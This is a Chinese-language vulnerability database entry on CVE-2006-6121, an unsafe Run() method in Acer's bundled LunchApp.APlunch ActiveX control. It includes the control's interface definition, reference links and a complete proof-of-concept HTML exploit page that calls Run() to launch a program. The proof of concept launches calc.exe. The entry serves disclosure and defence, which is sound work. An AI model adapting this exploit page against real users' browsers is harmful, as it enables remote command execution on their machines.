Acer LunchApp.APlunch ActiveX控件不安全Run方法漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111691 漏洞类型 设计错误
发布时间 2006-11-30 更新时间 2007-05-17
CVE编号 CVE-2006-6121 CNNVD-ID CNNVD-200611-426
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/2866
https://www.securityfocus.com/bid/21207
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-426
|漏洞详情
LunchApp.APlunch是Acer笔记本默认所捆绑的一个ActiveX控件。LunchApp.APlunch控件在处理用户输入参数时存在漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意程序。LunchApp.APlunch控件中有一个名为Run()的方法,该方式支持Drive、FileName和CmdLine参数,如下所示:[uuid(D9998BCF-7957-11D2-8FED-00606730D3AA),version(1.0),hidden,dual,nonextensible]dispinterface_APlunch{properties:methods:[id(0x60030000)]voidRun([in,out]BSTR*Drive,[in,out]BSTR*FileName,[in,out]BSTR*CmdLine);};如果用户受骗访问了恶意页面的话,Run()方式的最后一个参数就可能允许向可执行程序传送命令行参数,导致执行计算机上的任意程序。
|漏洞EXP
<!--
Author: Tan Chew Keong 
Site: http://vuln.sg/
Acer Notebook LunchApp.APlunch ActiveX Control Command Execution Exploit
-->

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</html>
</body>

# milw0rm.com [2006-11-30]
|受影响的产品
Microsoft Internet Explorer 5.0.1 SP4 - Microsoft Windows 2000 Advanced Server SP4 - Microsoft Windows 2000 Datacenter Server SP4 -
|参考资料

来源:VU#221700
名称:VU#221700
链接:http://www.kb.cert.org/vuls/id/221700
来源:TA07-128A
名称:TA07-128A
链接:http://www.us-cert.gov/cas/techalerts/TA07-128A.html
来源:XF
名称:acer-lunchappaplunch-command-execution(30417)
链接:http://xforce.iss.net/xforce/xfdb/30417
来源:BID
名称:21207
链接:http://www.securityfocus.com/bid/21207
来源:HP
名称:SSRT071422
链接:http://www.securityfocus.com/archive/1/archive/1/468871/100/200/threaded
来源:HP
名称:SSRT071422
链接:http://www.securityfocus.com/archive/1/archive/1/468871/100/200/threaded
来源:HP
名称:SSRT071422
链接:http://www.securityfocus.com/archive/1/archive/1/468871/100/200/threaded
来源:MS
名称:MS07-027
链接:http://www.microsoft.com/technet/security/Bulletin/MS07-027.mspx
来源:VUPEN
名称:ADV-2006-4602
链接:http://www.frsirt.com/english/advisories/2006/4602
来源:MISC
链接:http://www.f-secure.com/weblog/archives/archive-012007.html#00001073
来源:MISC
链接:http://vuln.sg/acerlunchapp-en.html
来源:SECUNIA
名称:23003
链接:http://secunia.com/advisories/23003
来源:global.acer.com
链接:http://global.acer.com/support/p